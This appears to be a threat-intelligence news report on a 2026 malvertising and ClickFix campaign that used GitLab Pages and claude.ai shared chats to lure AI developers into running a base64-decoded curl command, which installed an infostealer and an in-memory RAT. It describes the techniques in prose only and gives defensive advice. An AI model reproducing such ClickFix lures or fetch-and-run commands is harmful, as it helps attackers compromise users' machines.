Sophisticated Malvertising and Social Engineering Campaign Exploits AI Development Platforms
Recent investigations have uncovered a sophisticated campaign encompassing both malvertising and social engineering tactics. This campaign pivoted from weaponized GitLab Pages to manipulating the shared chat feature of claude.ai, allowing operators to deploy an in-memory remote-access trojan (RAT) through a China-themed loader chain. The extent and complexity of the threat have raised alarms among cybersecurity experts.
Tracking Malicious Activities Over Time
From April 8 to June 14, 2026, investigators tracked a staggering 106 unique malicious hostnames across six distinct attack waves, revealing a concerted effort by the attackers to rotate their infrastructure rapidly, maintain a targeted geographic focus, and continuously test their lure strategies based on AI developer tooling keywords. This careful orchestration illustrates a level of sophistication that is alarming in the realm of cybersecurity threats.
The attack flow was characterized by a blend of paid search malvertising, legitimate domain abuse, and a form of social engineering known as “ClickFix.” By leveraging genuine advertising channels, the attackers successfully drew in tech-savvy users searching for AI development tools, cleverly impersonating well-known brands such as Claude, ChatGPT Codex, and JetBrains. Victims were then directed to either GitLab Pages subdomains or, later, to claude.ai shared-chat URLs.
Exploiting Trust in High-Reputation Platforms
The attackers’ strategy involved using reputable platforms like gitlab.io and claude.ai, allowing them to circumvent domain-based security filters and browser heuristics. Victims unwittingly navigated to valid and certified pages, where conventional defenses against URL and certificate anomalies failed to signal any compromise. This manipulation of trust illustrates a significant shift in the tactics adopted by cybercriminals.
In the early phases of this campaign, attackers utilized 92 malicious GitLab Pages hostnames that masqueraded as software download pages. These pages prompted victims with ClickFix instructions, urging them to execute commands in Terminal or PowerShell. As noted by TrendAI™ Research, the operators made continual adjustments to their tactics to optimize their lures and broaden their targeting range.
The Loader Chain’s Intricacies
The command issued by the compromised pages fetched and executed a sophisticated multi-stage loader hosted on a server controlled by the attackers. This loader, which bore a China-themed motif, was engineered not to install a lasting payload but to enable the execution of an in-memory RAT. The operational design of this loader reduced the chance for forensic analysis and complicates efforts for endpoint protection solutions that rely on traditional file-based detection methods.
Tactics Intensify with Abuse of Shared Features
A notable escalation occurred when the attackers weaponized the shared feature of claude.ai, where they created no less than 61 unique shared conversation IDs. Various Google Ads campaigns specifically directed users to claude.ai’s share URLs. Since the malicious code resided on the claude.ai platform itself, defenses that typically flag low-reputation domains became ineffective.
In these shared chats, the attackers mimicked trusted support narratives, employing familiar personas such as "Apple Support" or "Corda Team." They would present curated, seemingly benign instructions, typically involving a single curl command piped through base64 decode, leading unsuspecting victims to an initial loader script. This script conducted thorough environment checks and, after determining that the machine was not operating with a Russian keyboard layout, would proceed to download and execute a variant of the MacSync infostealer before pivoting to the in-memory RAT stage.
The dual-use infrastructure also served Mac utility scams, showcasing the attackers’ strategic diversification to maximize click-through rates and expand their reach.
Geographical Focus and Victim Distribution
Geographically, the campaign disproportionately impacted the Asia-Pacific region, which accounted for approximately 67% of confirmed victims, with Taiwan representing roughly 30.5% of the overall traffic. This concentration clearly indicates deliberate geo-targeting strategies in Google Ads and the iterative testing of keywords across various AI brands to optimize engagement.
As the attacks progressed, operators continuously rotated campaign parameters and pages each week, leveraging performance analytics to refine their lures and broaden their targeting, eventually extending their reach to countries including Singapore, India, and various European nations.
Immediate Mitigation Responses
In response to these alarming activities, the AI platform operator, Anthropic, took swift action to remove the malicious shared conversations, banning the accounts involved and instituting further protections against such abuses in shared chats. TrendAI™ continues to monitor the evolving campaign and recommends rapid defensive measures, including disabling risky copy-paste execution workflows, educating users about ClickFix-style prompts, implementing script-blocking mechanisms, and conducting vigilant monitoring for in-memory RAT indicators.
The evolving threat landscape showcases the necessity for organizations and individuals to maintain a heightened awareness and adopt robust cybersecurity practices.